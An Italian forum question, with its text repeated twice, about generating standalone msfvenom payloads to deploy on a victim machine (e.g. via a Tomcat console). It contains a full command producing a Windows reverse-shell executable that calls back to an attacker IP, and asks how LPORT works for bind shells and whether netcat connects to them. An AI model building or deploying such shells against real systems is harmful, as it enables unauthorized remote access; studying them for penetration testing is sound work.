Ciao,
sto studiando come creare dei payload standalone con msfvenom, da lanciare direttamente sulla macchina vittima nel caso in cui si abbia la possibilità di effettuare il deploy (come ad esempio ottenendo l'accesso ad una console Tomcat sulla macchina remota).
Per quanto riguarda un payload di tipo reverse con una shell (payload/windows/shell/reverse_tcp) è presto detto: i due parametri da settare sono LHOST e LPORT, cioè l'indirizzo e la porta su cui fare il connect-back, cioè connettersi alla macchina dell'attaccante. il comando è il seguente:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=5555 -f exe -o /tmp/reverse_tcp_payload.exe
LPORT e LHOST sono rispettivamente l'indirizzo e la porta della mia macchina attaccante che funge da server.
Il mio dubbio è relativo al payoad di tipo bind (payload/windows/shell_bind_tcp): i parametri da settare sono:
LPORT: The listen port
RHOST: The target address
RHOST è l'ip della macchina vittima (non è necessario specificarlo).
L'incertezza riguarda il parametro LPORT --> solitamente con LPORT si intende la porta della macchina attaccante, ma poichè questo non è un reverse, cioè non ci dobbiamo connettere dalla macchina vittima alla macchina attaccante non ne capisco l'utilità.
Mi verrebbe da pensare quindi che LPORT sia la porta in listening della macchina vittima(RHOST) anche se solitamente questa si indica con RPORT.
Oltre questo vorrei capire, dopo che si è avviata la backdoor bind con il payload, in che modo connettersi alla macchina vittima che è in listening.
è possibile utilizzare direttamente netcat?
sto studiando come creare dei payload standalone con msfvenom, da lanciare direttamente sulla macchina vittima nel caso in cui si abbia la possibilità di effettuare il deploy (come ad esempio ottenendo l'accesso ad una console Tomcat sulla macchina remota).
Per quanto riguarda un payload di tipo reverse con una shell (payload/windows/shell/reverse_tcp) è presto detto: i due parametri da settare sono LHOST e LPORT, cioè l'indirizzo e la porta su cui fare il connect-back, cioè connettersi alla macchina dell'attaccante. il comando è il seguente:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=5555 -f exe -o /tmp/reverse_tcp_payload.exe
LPORT e LHOST sono rispettivamente l'indirizzo e la porta della mia macchina attaccante che funge da server.
Il mio dubbio è relativo al payoad di tipo bind (payload/windows/shell_bind_tcp): i parametri da settare sono:
LPORT: The listen port
RHOST: The target address
RHOST è l'ip della macchina vittima (non è necessario specificarlo).
L'incertezza riguarda il parametro LPORT --> solitamente con LPORT si intende la porta della macchina attaccante, ma poichè questo non è un reverse, cioè non ci dobbiamo connettere dalla macchina vittima alla macchina attaccante non ne capisco l'utilità.
Mi verrebbe da pensare quindi che LPORT sia la porta in listening della macchina vittima(RHOST) anche se solitamente questa si indica con RPORT.
Oltre questo vorrei capire, dopo che si è avviata la backdoor bind con il payload, in che modo connettersi alla macchina vittima che è in listening.
è possibile utilizzare direttamente netcat?